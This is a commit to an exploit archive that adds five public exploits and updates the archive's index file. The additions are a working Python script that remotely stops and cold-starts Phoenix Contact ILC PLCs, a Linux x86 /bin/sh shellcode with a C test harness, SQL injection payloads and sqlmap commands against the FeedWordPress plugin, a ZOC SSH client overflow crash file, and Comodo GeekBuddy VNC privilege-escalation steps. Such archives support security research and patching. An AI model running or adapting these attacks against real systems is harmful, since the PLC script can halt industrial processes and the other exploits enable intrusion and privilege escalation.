DB: 2015-05-21

5 new exploits
2015-05-21 05:03:22 +00:00 · 2015-05-21 05:03:22 +00:00 · 62ba41ab0a
commit 62ba41ab0a
parent fb6e945657
6 changed files with 354 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -33251,6 +33251,7 @@ id,file,description,date,author,platform,type,port
 36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0
 36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 'DOC' Parameter Directory Traversal Vulnerability",2009-04-17,MustLive,cgi,webapps,0
 36995,platforms/hardware/remote/36995.txt,"F5 FirePass <= 7.0 SQL Injection Vulnerability",2012-03-14,anonymous,hardware,remote,0
+37065,platforms/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local,0
 36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - SEH Overflow Crash PoC",2015-04-28,"Avinash Thapa",windows,dos,0
 36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x viewFriends.php Multiple Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0
 36854,platforms/php/webapps/36854.txt,"Dolphin 7.0.x explanation.php explain Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0
@ -33441,4 +33442,8 @@ id,file,description,date,author,platform,type,port
 37061,platforms/multiple/dos/37061.txt,"Sony Bravia KDL-32CX525 'hping' Command Remote Denial Of Service Vulnerability",2012-04-05,"Gabriel Menezes Nunes",multiple,dos,0
 37062,platforms/php/webapps/37062.txt,"VBulletin 4.1.10 'announcementid' Parameter SQL Injection Vulnerability",2012-04-04,Am!r,php,webapps,0
 37063,platforms/php/webapps/37063.txt,"WordPress TagGator 'tagid' Parameter SQL Injection Vulnerability",2012-04-05,Am!r,php,webapps,0
-37064,platforms/win64/local/37064.py,"Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058)",2015-05-19,ryujin,win64,local,0
+37064,platforms/win64/local/37064.py,"Windows 8.0 - 8.1 x64 - TrackPopupMenu Privilege Escalation (MS14-058)",2015-05-19,ryujin,win64,local,0
+37066,platforms/hardware/remote/37066.py,"Phoenix Contact ILC 150 ETH PLC Remote Control Script",2015-05-20,Photubias,hardware,remote,0
+37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80
+37068,platforms/windows/dos/37068.py,"ZOC SSH Client Buffer Overflow Vulnerability (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0
+37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 execve ""/bin/sh"" - shellcode 26 bytes",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0
--- a/platforms/hardware/remote/37066.py
+++ b/platforms/hardware/remote/37066.py
@ -0,0 +1,188 @@
+#! /usr/bin/env python
+'''
+    # Exploit Title: Phoenix Contact ILC 150 ETH PLC Remote Control script
+    # Date: 2015-05-19
+    # Exploit Author: Photubias - tijl[dot]deneut[at]howest[dot]be
+    # Vendor Homepage: https://www.phoenixcontact.com/online/portal/us?urile=pxc-oc-itemdetail:pid=2985330
+    # Version: ALL FW VERSIONS
+    # Tested on: Python runs on Windows, Linux
+    # CVE : CVE-2014-9195
+
+    Copyright 2015 Photubias(c)
+
+    Written for Howest(c) University College
+
+    This program is free software: you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation, either version 3 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+File name ControlPLC.py
+written by tijl[dot]deneut[at]howest[dot]be
+This POC will print out the current status of the PLC, continuously every 0.1 second, after 3 seconds it reverts (start becomes stop, stop becomes cold start), and stops after 5 seconds
+Works on ILC 15x ETH, partly on RFC 43x, partly on ILC 39x
+'''
+import sys, socket, binascii, time, os, select, re
+
+IP=''
+infoport=1962
+controlport=41100
+
+
+## Defining Functions First
+def send_and_recv(s,size,strdata):
+    data = binascii.unhexlify(strdata) ## Convert to real HEX (\x00\x00 ...)
+    s.send(data)
+    ret = s.recv(4096)
+    return ret
+
+def doAction(s,strdata):
+    ret = send_and_recv(s,1000,strdata)
+    # In official state these are send, they do not seem to be needed
+    send_and_recv(s,1000,packet1)
+    send_and_recv(s,1000,packet2)
+    send_and_recv(s,1000,packet2)
+    ret = send_and_recv(s,1000,'010002000000020003000100000000000840')
+    send_and_recv(s,1000,packet2)
+    return ret
+
+def initMonitor(s):
+    send_and_recv(s,1000,'0100000000002f00000000000000cfff4164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c536572766963653200')
+    send_and_recv(s,1000,'0100000000002e0000000000000000004164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c5365727669636500')
+    send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446174614163636573735365727669636500')
+    send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e49446576696365496e666f536572766963653200')
+    send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446576696365496e666f5365727669636500')
+    send_and_recv(s,1000,'0100000000002500000000000000d9ff4164652e52656d6f74696e672e53657276696365732e49466f726365536572766963653200')
+    send_and_recv(s,1000,'010000000000240000000000000000004164652e52656d6f74696e672e53657276696365732e49466f7263655365727669636500')
+    send_and_recv(s,1000,'0100000000003000000000000000ceff4164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653300')
+    send_and_recv(s,1000,'010000000000300000000000000000004164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653200')
+    send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e49446576696365496e666f536572766963653200')
+    send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446576696365496e666f5365727669636500')
+    send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e4944617461416363657373536572766963653300')
+    send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446174614163636573735365727669636500')
+    send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e4944617461416363657373536572766963653200')
+    send_and_recv(s,1000,'0100000000002900000000000000d5ff4164652e52656d6f74696e672e53657276696365732e49427265616b706f696e745365727669636500')
+    send_and_recv(s,1000,'0100000000002800000000000000d6ff4164652e52656d6f74696e672e53657276696365732e4943616c6c737461636b5365727669636500')
+    send_and_recv(s,1000,'010000000000250000000000000000004164652e52656d6f74696e672e53657276696365732e494465627567536572766963653200')
+    send_and_recv(s,1000,'0100000000002f00000000000000cfff4164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c536572766963653200')
+    send_and_recv(s,1000,'0100000000002e0000000000000000004164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c5365727669636500')
+    send_and_recv(s,1000,'0100000000003000000000000000ceff4164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653300')
+    send_and_recv(s,1000,'010000000000300000000000000000004164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653200')
+    send_and_recv(s,1000,'0100020000000e0003000300000000000500000012401340130011401200')
+    return
+
+def is_ipv4(ip):
+	match = re.match("^(\d{0,3})\.(\d{0,3})\.(\d{0,3})\.(\d{0,3})$", ip)
+	if not match:
+		return False
+	quad = []
+	for number in match.groups():
+		quad.append(int(number))
+	if quad[0] < 1:
+		return False
+	for number in quad:
+		if number > 255 or number < 0:
+			return False
+	return True
+
+##### The Actual Program
+if not len(sys.argv) == 2:
+        IP = raw_input("Please enter the IPv4 address of the Phoenix PLC: ")
+else:
+        IP = sys.argv[1]
+        
+if not is_ipv4(IP):
+	print "Please go read RFC 791 and then use a legitimate IPv4 address."
+	sys.exit()
+	
+## - initialization, this will get the PLC type, Firmware version, build date & time
+s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect((IP,infoport))
+
+print 'Initializing PLC'
+print '----------------'
+code = send_and_recv(s,1000,'0101001a005e000000000003000c494245544830314e305f4d00').encode('hex')[34:36]
+send_and_recv(s,1000,'01050016005f000008ef00' + code + '00000022000402950000')
+ret = send_and_recv(s,1000,'0106000e00610000881100' + code + '0400')
+print 'PLC Type  = ' + ret[30:50]
+print 'Firmware  = ' + ret[66:70]
+print 'Build     = ' + ret[79:100]
+send_and_recv(s,1000,'0105002e00630000000000' + code + '00000023001c02b0000c0000055b4433325d0b466c617368436865636b3101310000')
+send_and_recv(s,1000,'0106000e0065ffffff0f00' + code + '0400')
+send_and_recv(s,1000,'010500160067000008ef00' + code + '00000024000402950000')
+send_and_recv(s,1000,'0106000e0069ffffff0f00' + code + '0400')
+send_and_recv(s,1000,'0102000c006bffffff0f00' + code)
+
+s.shutdown(socket.SHUT_RDWR)
+s.close()
+print 'Initialization done'
+print '-------------------\r\n'
+print 'Will now print the PLC state and reverse it after 3 seconds'
+raw_input('Press [Enter] to continue')
+
+########## CONTROL PHASE ####### Start monitoring with loop on port 41100
+s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect((IP,controlport))
+# First init phase (sending things like 'Ade.Remoting.Services.IProConOSControlService2' and 'Ade.Remoting.Services.ISimpleFileAccessService3', 21 packets)
+initMonitor(s)
+# Query packet
+packet1 = '010002000000080003000300000000000200000002400b40'
+# Keepalive packet
+packet2 = '0100020000001c0003000300000000000c00000007000500060008001000020011000e000f000d0016401600'
+## The loop keepalive and query status loop (2 x keepalive, one time query):
+i = 0
+state = 'On'
+running = 0
+stopme = 0
+startme = 0
+while True:
+    i += 1
+    time.sleep(0.1)
+    ## Keep Alive
+    send_and_recv(s,1000,packet2)
+    send_and_recv(s,1000,packet2)
+
+    ## Possible actions (like stop/start) should be sent now before the query state
+    if (state == 'Running' and stopme):
+        print 'Sending Stop'
+        doAction(s,'01000200000000000100070000000000')
+        startme = stopme = 0
+    elif (state == 'Stop' and startme):
+        print 'Sending COLD Start'
+        ## This is the COLD start: doAction(s,'010002000000020001000600000000000100')
+        ## This is the WARM start: doAction(s,'010002000000020001000600000000000200')
+        ## This is the HOT  start: doAction(s,'010002000000020001000600000000000300')
+        doAction(s,'010002000000020001000600000000000100')
+        startme = stopme = 0    
+
+    ## Query Status
+    ret = send_and_recv(s,1000,packet1).encode('hex')
+    if ret[48:50] == '03':
+        state = 'Running'
+    elif ret[48:50] == '07':
+        state = 'Stop'
+    elif ret[48:50] == '00':
+        state = 'On'
+    else:
+        print 'State unknown, found code: '+ret.encode('hex')[48:50]
+    print 'Current PLC state: '+state
+    
+    ## Maintaining the LOOP
+    if i == 50:
+        break
+#   '''
+    if i == 30:
+        if state == 'Running':
+            stopme = 1
+        else:
+            startme = 1
+    #'''
+raw_input('All done, press [Enter] to exit')
--- a/platforms/lin_x86/shellcode/37069.c
+++ b/platforms/lin_x86/shellcode/37069.c
@ -0,0 +1,58 @@
+/*
+; Title: Linux/x86 execve "/bin/sh" - shellcode 26 bytes
+; Platform: linux/x86_64
+; Date: 2015-05-19
+; Author: Reza Behzadpour
+; Simple ShellCode
+
+	section .text
+	global _start
+	
+	_start:
+	
+	xor  ecx,ecx
+	mul  ecx
+
+	;execve("/bin/sh", NULL, NULL)
+	mov  al,11
+	jmp  shell
+	shell_ret:
+	pop  ebx
+	push ecx
+	push ebx
+	pop  ebx
+	int  0x80
+ 
+	shell:
+	call shell_ret
+	db  "/bin/sh"
+
+*/
+
+/*
+
+# tcc -o ./shellcode ./shellcode.c
+# uname -r
+3.12-kali1-686-pae
+
+*/
+
+#include <stdio.h>
+#include <string.h>
+  
+char shellcode[] = {
+     "\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b"
+     "\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff"
+     "\xff\x2f\x62\x69\x6e\x2f\x73\x68"
+};
+ 
+int main() 
+{
+ 
+	printf("Shellcode Length:  %d\n", (int)strlen(shellcode));
+	int *ret;
+	ret = (int *) &ret + 2;
+	(*ret) = (int) shellcode;
+ 
+	return 0;
+}
--- a/platforms/php/webapps/37067.txt
+++ b/platforms/php/webapps/37067.txt
@ -0,0 +1,52 @@
+# Exploit Title: SQLi in FeedWordPress WordPress plugin
+# Date: 2015-05-19
+# Exploit Author: Adrián M. F.
+# Vendor Homepage: https://wordpress.org/plugins/feedwordpress/
+# Vulnerable version: 2015.0426
+# Fixed version: 2015.0514
+# CVE : CVE-2015-4018
+
+
+(1) Authenticated SQLi [CWE-89]
+-------------------------------
+
+* CODE:
+feedwordpresssyndicationpage.class.php:89
+++++++++++++++++++++++++++++++++++++++++
+$targets = $wpdb->get_results("
+    SELECT * FROM $wpdb->links
+    WHERE link_id IN (".implode(",",$_POST['link_ids']).")
+");
+++++++++++++++++++++++++++++++++++++++++
+http://192.168.167.131/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php
+POST DATA: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1[SQLi]
+
+* POC:
+SQLMap
+++++++++++++++++++++++++++++++++++++++++
+./sqlmap.py -u "http://[domain]/wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=Y" --data="_wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1" -p "link_ids[]" --dbms mysql --cookie="[cookie]"
+[............]
+POST parameter 'link_ids[]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
+sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
+---
+Parameter: link_ids[] (POST)
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
+    Payload: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1) AND (SELECT * FROM (SELECT(SLEEP(5)))eHWc) AND (7794=7794
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 13 columns
+    Payload: _wpnonce=a909681945&_wp_http_referer=/wordpress/wp-admin/admin.php?page=feedwordpress/syndication.php&action=Update Checked&link_ids[]=1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x70716153577975544373,0x7178716271)-- 
+---
+[10:40:14] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Debian 7.0 (wheezy)
+web application technology: Apache 2.2.22, PHP 5.4.39
+back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++
+
+Timeline
+========
+2015-05-09: Discovered vulnerability.
+2015-05-14: Vendor notification.
+2015-05-14: Vendor response and fix.
+2015-05-19: Public disclosure.
--- a/platforms/windows/dos/37068.py
+++ b/platforms/windows/dos/37068.py
@ -0,0 +1,19 @@
+"""
+# Exploit title: ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH)
+# Date: 20-5-2015
+# Vendor homepage: www.emtec.com
+# Software Link: http://www.emtec.com/cgi-local/download.cgi?what=ZOC7%20(Windows)&link=zoc/zoc7030.exe&ext=html
+# Author: Dolev Farhi
+
+# Details:
+# --------
+# Create a new connection, run the py script and copy the AAAA...string from zoc.txt to clipboard. paste it in the
+# server address and attempt to connect.
+"""
+
+#!/usr/bin/python
+filename="zoc.txt"
+buffer = "\x41" * 97
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
--- a/platforms/windows/local/37065.txt
+++ b/platforms/windows/local/37065.txt
@ -0,0 +1,31 @@
+Comodo GeekBuddy Local Privilege Escalation (CVE-2014-7872)
+
+Jeremy Brown [jbrown3264/gmail]
+
+-Synopsis-
+
+Comodo GeekBuddy, which is bundled with Comodo Anti-Virus, Comodo Firewall
+and Comodo Internet Security, runs a passwordless, background VNC server
+and listens for incoming connections. This can allow for at least local
+privilege escalation on several platforms. It also may be remotely
+exploitable via CSRF-like attacks utilizing a modified web-based VNC client
+(eg. a Java VNC client).
+
+-Repro-
+
+1) Install GeekBuddy (either standalone or bundled with the aforementioned
+packages)
+2) Administrator (or other user) logs into the system so the VNC server
+will be started
+3) Start another login to the system (eg. target OS is Windows Server)
+4) Connect to the VNC server on localhost to assume the Admin session
+
+-Fix-
+
+Comodo says they have fix this vulnerability with the v4.18.121 release in
+October 2014
+
+-References-
+
+https://technet.microsoft.com/en-US/dn613815
+http://archive.hack.lu/2014/Microsoft%20Vulnerability%20Research%20-%20How%20to%20be%20a%20Finder%20as%20a%20Vendor.pdf